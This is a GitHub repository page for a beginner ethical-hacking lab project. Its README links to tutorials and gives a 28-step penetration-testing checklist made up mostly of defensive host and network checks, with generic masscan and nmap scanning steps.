Skip to content

steveschofield/build-beginner-ethical-hacking-environment

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
.vscode
.vscode
 
 
devsecops
devsecops
 
 
docs
docs
 
 
environments
environments
 
 
pentesting
pentesting
 
 
rag-resources
rag-resources
 
 
resources
resources
 
 
.gitignore
.gitignore
 
 
CLAUDE.md
CLAUDE.md
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

Build a Beginner Ethical Hacking Environment

Begin your Ethical Hacking journey. This documentation shares tricks and free software available to start the journey. There are several tutorials, AI can also assist, to help setup and learn the craft. This is an exciting, frustrating and overall challenge but is rewarding.

Students and individuals have inquired "How do I get started?"

Checklist for setting up your own environment.

Automated server building using Vagrant by Hashicorp, embedded vulnerable container apps

My YouTube Channel

  • YouTube channel building environments videos and other things I have became obsessed with.

YouTube videos to get started in order

Misc Pentesting steps

Part of a penetration test is checking for malware vulnerabilities. When performing a penetration test, the penetration tester follows a set of steps:

  1. Scan for open ports.
  2. Scan for running processes.
  3. Check for suspicious or unknown registry entries.
  4. Verify all running Windows services.
  5. Check startup programs.
  6. Look through event log for suspicious events.
  7. Verify all installed programs.
  8. Scan files and folders for manipulation.
  9. Verify that device drivers are legitimate.
  10. Check all network and DNS settings and activity.
  11. Scan for suspicious API calls.
  12. Run anti-malware scans.
  13. Document results and findings.
  14. Run a full TCP port sweep with masscan to quickly identify exposed services at scale.
  15. Validate masscan findings with nmap -sV -sC to confirm versions and default script results.
  16. Use nmap -O and service fingerprinting to identify unexpected operating systems and hosts.
  17. Run targeted nmap NSE vulnerability checks (for SMB, RDP, HTTP, SSL/TLS, and DNS).
  18. Use nmap UDP scans (-sU) for high-risk services like DNS, SNMP, and NTP.
  19. Identify weak TLS ciphers and certificate issues on exposed HTTPS services.
  20. Check SMB shares, signing settings, and anonymous access exposures.
  21. Audit RDP and SSH hardening (MFA, lockout policy, weak auth settings, legacy protocol support).
  22. Enumerate local admins and privileged groups for unauthorized or stale accounts.
  23. Verify scheduled tasks and cron jobs for persistence mechanisms and suspicious commands.
  24. Inspect PowerShell logs and command history for encoded or obfuscated execution patterns.
  25. Baseline outbound connections and detect beaconing to unknown IPs/domains.
  26. Inspect DNS query logs for tunneling patterns, DGA-like domains, and unusual record types.
  27. Check endpoint security controls (EDR/AV/firewall) for tampering, disabled agents, or policy drift.
  28. Re-test remediated findings and record evidence (commands, output, timestamps, and risk ratings).

About

Build an environment to begin Ethical Hacking journey

Resources

Readme

License

View license
Activity

Stars

6 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages